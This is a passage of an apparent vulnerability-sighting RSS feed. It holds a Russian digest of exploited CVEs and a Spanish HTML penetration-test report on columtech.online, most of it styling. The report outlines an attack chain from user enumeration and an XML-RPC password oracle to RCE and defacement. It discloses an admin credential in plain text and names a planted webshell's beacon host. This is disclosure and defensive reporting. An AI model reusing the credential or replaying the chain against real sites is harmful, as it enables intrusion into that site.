\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440.\n\n2. 
\u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (CVE-2026-8206) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 Kirki - Freeform Page Builder, Website Builder &amp;amp; Customizer \u0434\u043b\u044f WordPress \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b Defiant, \u0447\u0435\u0439 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u044d\u043a\u0440\u0430\u043d Wordfence \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b \u0431\u043e\u043b\u0435\u0435 222 \u043f\u043e\u043f\u044b\u0442\u043e\u043a\u00a0\u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 24 \u0447\u0430\u0441\u0430. 
CVE-2026-8206 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 REST API \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e 'handle_forgot_password()'.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u043d\u0430 500 000 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0431\u044a\u0435\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0443 \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0438\u043c\u0435\u044e\u0442\u0441\u044f. 
\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0Wordfence, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0432 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c \u043a\u0440\u0443\u043f\u043d\u043e\u043c \u0440\u0435\u043b\u0438\u0437\u0435, \u0432\u0435\u0440\u0441\u0438\u0438 6.0.0, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e 6.0.6 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0435, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\u00a0\u0441 WordPress, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u043e\u0447\u0442\u0438 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043b\u0430\u0433\u0438\u043d\u0430.\n\n3. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f. 
\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043c\u043c\u0430\u0440 \u0410\u0441\u043a\u0430\u0440 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (GitHub), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0434\u043d\u0438\u043c \u0449\u0435\u043b\u0447\u043a\u043e\u043c \u043c\u044b\u0448\u0438 \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u0442\u043e\u043a\u0435\u043d\u044b GitHub \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 Visual Studio Code.\n\n\u041f\u0440\u0438\u0447\u0435\u043c, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u044b\u043b\u0438 \u043f\u0440\u043e\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0439 \u0438\u043b\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u0438\u044f.\n\n4. 
BishopFox \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0438\u00a0\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f CVE-2026-22557, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043f\u0440\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Ubiquiti UniFi.\n\n5. HP \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0434\u043b\u044f \u0441\u0432\u043e\u0438\u0445 VoIP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u043e\u0432 \u0441\u0435\u0440\u0438\u0438 VVX, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0826, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0445 \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Rapid7, \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.\n\n6. Positive Technologies \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043c\u0430\u0439\u0441\u043a\u0438\u0439 \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 \u0412 \u0442\u0440\u0435\u043d\u0434\u0435 VM, \u0443\u043a\u0430\u0437\u0430\u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux (CVE-2026-31431), ActiveMQ (CVE-2026-34197), SharePoint (CVE-2026-32201) \u0438 Acrobat Reader (CVE-2026-34621).\n\n7. CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux CVE-2022-0492 (CVSS 7,8) \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u0445\u043e\u0434\u0443 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432. 
\u041e\u043d\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d.\n\n8. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u0430 HTTP/2 Bomb \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0437\u0430 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Calif \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b DoS-\u0430\u0442\u0430\u043a \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nHTTP/2 Bomb \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Codex \u043e\u0442 OpenAI \u0438 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0431\u043e\u043c\u0431\u0443 \u0441\u0436\u0430\u0442\u0438\u044f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0441\u0445\u0435\u043c\u0443 \u0441\u0436\u0430\u0442\u0438\u044f 
\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u0432 HTTP/2 (HPACK), \u0441 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0432 \u0441\u0442\u0438\u043b\u0435 Slowloris, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 880 000 \u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 HTTP/2 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 NGINX, Apache HTTPD, Microsoft IIS, Envoy \u0438\u043b\u0438 Cloudflare Pingora.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0430 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0440\u0438 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 100 \u041c\u0431\u0438\u0442/\u0441 \u0438 \u0432 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b \u0432\u044b\u0432\u0435\u0441\u0442\u0438 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u044d\u0442\u0438\u0445 
\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.", "creation_timestamp": "2026-06-03T18:30:06.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/87454edc-0362-4000-9231-ea207a52fd71/export</guid>
      <pubDate>Wed, 03 Jun 2026 18:30:06 +0000</pubDate>
    </item>
    <item>
      <title>5d6554f7-d228-462b-abd3-3233cbf92ca0</title>
      <link>https://vulnerability.circl.lu/sighting/5d6554f7-d228-462b-abd3-3233cbf92ca0/export</link>
      <description>{"uuid": "5d6554f7-d228-462b-abd3-3233cbf92ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n  :root {\n    --bg: #0b0d12;\n    --bg-2: #11151c;\n    --panel: #161b25;\n    --panel-2: #1d2330;\n    --border: #2a3142;\n    --text: #e6e9ef;\n    --text-dim: #99a2b3;\n    --accent: #ff4d6d;\n    --accent-2: #ffb86b;\n    --crit: #ff3d57;\n    --high: #ff8b3d;\n    --med:  #ffd84a;\n    --low:  #4ac6ff;\n    --info: #8c9fb0;\n    --ok: #3ddc97;\n    --code-bg: #0a0d14;\n    --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n  }\n  * { box-sizing: border-box; }\n  html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n               font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n               line-height: 1.55; -webkit-font-smoothing: antialiased; }\n  a { color: var(--accent-2); text-decoration: none; }\n  a:hover { text-decoration: underline; }\n  .hero {\n    padding: 60px 40px 50px;\n    background:\n      radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n      radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n      linear-gradient(180deg, #0e1219, #0b0d12);\n    border-bottom: 1px solid var(--border);\n  }\n  .hero-inner { max-width: 1100px; margin: 0 auto; }\n  .eyebrow {\n    display: inline-flex; align-items: center; gap: 8px;\n    font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n    text-transform: uppercase; color: var(--accent);\n    padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n    border-radius: 999px; background: 
rgba(255,77,109,0.08);\n  }\n  .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n  .hero h1 .accent { color: var(--accent); }\n  .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n  .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n  .meta .card { background: rgba(22,27,37,0.7); border: 1px solid var(--border); border-radius: 10px; padding: 14px 16px; }\n  .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n  .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n  .author-strip {\n    display: flex; align-items: center; gap: 14px; margin-top: 24px;\n    padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n    background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n  }\n  .author-strip strong { color: var(--accent); }\n  .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n  section { margin-bottom: 60px; }\n  h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n  h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n  h3 { font-size: 19px; margin: 22px 0 10px; }\n  p { color: var(--text); }\n  p.dim { color: var(--text-dim); }\n  .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n  .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n  .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n  .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n  .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n  .stat.med  .num { 
color: var(--med); }  .stat.low  .num { color: var(--low); }\n  .stat.info .num { color: var(--info); }\n  table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n  table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n  table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n  table.summary tr:last-child td { border-bottom: none; }\n  table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n  .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n  .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n  .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n  .badge.med  { background: rgba(255,216,74,0.13); color: var(--med);  border: 1px solid rgba(255,216,74,0.4); }\n  .badge.low  { background: rgba(74,198,255,0.13); color: var(--low);  border: 1px solid rgba(74,198,255,0.4); }\n  .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n  .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n  .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n  .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n  .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n  .finding.med .head  { box-shadow: inset 4px 0 0 0 var(--med); }\n  .finding.low .head  { 
box-shadow: inset 4px 0 0 0 var(--low); }\n  .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n  .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n  .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n  .finding .body { padding: 22px; }\n  .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n  .finding .body h4:first-child { margin-top: 0; }\n  .finding ul { margin: 0 0 6px; padding-left: 22px; }\n  .finding li { margin-bottom: 4px; }\n  pre, code { font-family: var(--mono); font-size: 13px; }\n  pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n  code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n  .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n  .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n  .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n  .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n  .callout.warn   { border-color: var(--high); background: rgba(255,139,61,0.06); }\n  .callout.ok     { border-color: var(--ok);  background: rgba(61,220,151,0.06); }\n  footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n  footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n  .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n  .chain-step { display: 
flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n  .chain-step:last-child { margin-bottom: 0; }\n  .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n  .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n  .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n  @media (max-width: 760px) {\n    .hero h1 { font-size: 32px; }\n    .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n    .container, .hero { padding: 30px 22px; }\n  }\n\n\n\n\n\n\n  \n\n    \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n    \nColumtech OnlineInforme de Seguridad Web\n    \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n    \n\n      \n\nObjetivo\ncolumtech.online\n      \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n      \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n      \n\nFecha\n2026-06-03 / 04\n    \n\n    \n\n      Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 autorizaci\u00f3n total\n    \n  \n\n\n\n\n\n  \n\n    \nResumen Ejecutivo\n    \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. 
La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n    \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n    \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n    \n\n      Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n    \n\n    \n\n      \n\n3\nCr\u00edticos\n      \n\n4\nAltos\n      \n\n4\nMedios\n      \n\n4\nBajos\n      \n\n3\nInformativos\n    \n  \n\n  \n\n    \nCadena de Ataque Demostrada\n    \n\n      \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n      \n\u2193\n      \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n      \n\u2193\n      \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n      \n\u2193\n      \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n      \n\u2193\n      \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n      \n\u2193\n      \n\n6\nDefacing: t\u00edtulo del sitio 
